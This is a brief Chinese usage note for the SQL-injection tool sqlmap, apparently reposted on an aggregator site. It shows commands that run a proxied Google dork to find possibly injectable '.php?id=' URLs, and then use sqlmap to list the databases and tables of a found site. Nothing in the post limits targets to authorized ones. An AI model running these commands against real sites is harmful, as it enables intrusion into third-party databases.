sqlmap 使用笔记

Posted 懒企鹅

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap 使用笔记相关的知识,希望对你有一定的参考价值。

1、sqlmap -hh 查看详细说明

2、使用google

proxychains sqlmap -g " inurl:\".php?id=1\" "

 自动发现可能有漏洞的url

3、选择上一步得到的url,探测用户名,数据库等等

sqlmap -u "http://www.xxxxxx.com/subcat.php?id=1" --dbs --tables

 

以上是关于sqlmap 使用笔记的主要内容,如果未能解决你的问题,请参考以下文章